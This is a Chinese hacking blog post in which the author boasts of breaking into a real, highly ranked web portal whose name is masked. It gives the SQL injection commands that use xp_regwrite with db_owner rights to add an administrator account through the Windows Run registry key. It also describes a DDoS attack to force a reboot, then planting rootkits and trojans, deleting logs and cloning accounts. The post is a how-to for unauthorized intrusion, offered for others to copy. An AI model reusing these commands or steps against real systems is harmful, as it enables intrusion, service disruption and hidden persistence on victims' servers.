相信大家都看过LCX大虾写的《MSSQL db_owner角色注入直接获得系统权限》吧,小弟不自量力也写写我利用MSSQL db_owner角色注入直接获得系统权限的方法。LCX大哥大致取得系统权限的思路是利用MSSQL中xp_regread的存储过程读出vnc在注册表中的密码,然后再破解,就可以拿到管理员权限。可是在网上毕竟装vnc的服务器是少数,要是一台你很想进入的服务器不装vnc,也就是说没有5900端口,尽管这个网站存在注射漏洞,你破出管理员密码,找到后台(假设这个网站没有数据库备份和文件上传及上传漏洞)但是你却没有办法取得一个shell,只有干瞪眼的份。还好sql在提供xp_regread的时候还给我们附带拉个xp_regwrite,我就利用xp_regwrite来拿系统权限,下面是我利用xp_regwrite取得系统权限的一次经历。
http://www.***.com是一个比较大的综合门户网站,ALEXA排名在前100名,好,今天的目标就是他拉,在搞之前首先要采好点,呵呵,也就是要找到注射点,这个是我们今天入侵的基础。在主页上看拉看,全部是静态网页,不存在注射的可能,可能你会说他可能是后台生成htm(开始偶也是这么认为,可是进去之后才知道原来根本不是),再源文件里找拉找也没有asp?的踪影,好看看其他的吧,恩,没费多少时间在他的动漫网中找到拉一个注射点,呵呵,开始抄家伙,恩,没费多大径就用NBSI2暴出拉管理员的密码,管理后台以及找到拉网站的绝对路径,本来以为接下来想要一个webshell应该很容易,谁知道要比我想的难得多,没有上传漏洞也就算拉,竟然连数据库备份的功能也没有,把asp木马改成后缀为jpg,gif上传竟然也没法上传成功,我倒,难道就这样放弃拉,我可不是那种轻言放弃的人,不过暂时我也没有什么好的办法,明天还要上课,只好暂时放弃。
第二天,我连上课心情都没有,满脑子里想的全是怎么拿到webshell或系统权限。好不容易等到下课,赶紧跑道计算机室里上网找找有没有关于这方面的资料,呵呵,黄天不负有心人终于让偶给找到拉一篇CZY大虾写的《How to execute system command in MSSQL》里面详述拉怎么获得管理员权限的方法,可是我的情况和czy文章里的情况略有不同,那个网站连接数据库的用户没有服务器sysadmin权限,只有数据库db_owner的权限,好多存储过程不好用,不过还好xp_regread和xp_regwrite好利用,这两个只要db_owner就好运行。好,说干就干,赶紧打开网站在注射点输入
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\
currentversion\run','xwq1','REG_SZ','net user xwq xwq /add'
呵呵,返回一个正常页面,说明成功完成拉,再在注射点输入
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\
currentversion\run','xwq2','REG_SZ','net localgroup administrators xwq /add'
好,只要让服务器重起,就会在系统中加上xwq这个管理员帐号,至于怎么让他重起,就要看各位的能耐拉,我可是迫不及待拉,赶紧ddos,过没多久,服务器就重起拉,马上用远程桌面连接连上去(呵呵,可能管理员觉得3389比较好把),输入xwq,xwq,yeah!!!进去拉,好拉接下来的事么就是留个后门rootkit+dll插入木马+asp,删除日志,克隆帐号,删除xwq这个帐号,闪人。
后记,其实直接加管理员帐号的作法,很冒险,要是管理员就在电脑旁边,他肯定回起疑心,反而暴露自己的行踪,呵呵,看你运气拉。你也可以在知道网站的绝对路径之后再利用xp_regwrite在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\currentversion\run里写上一句话木马,在用asp木马提权。
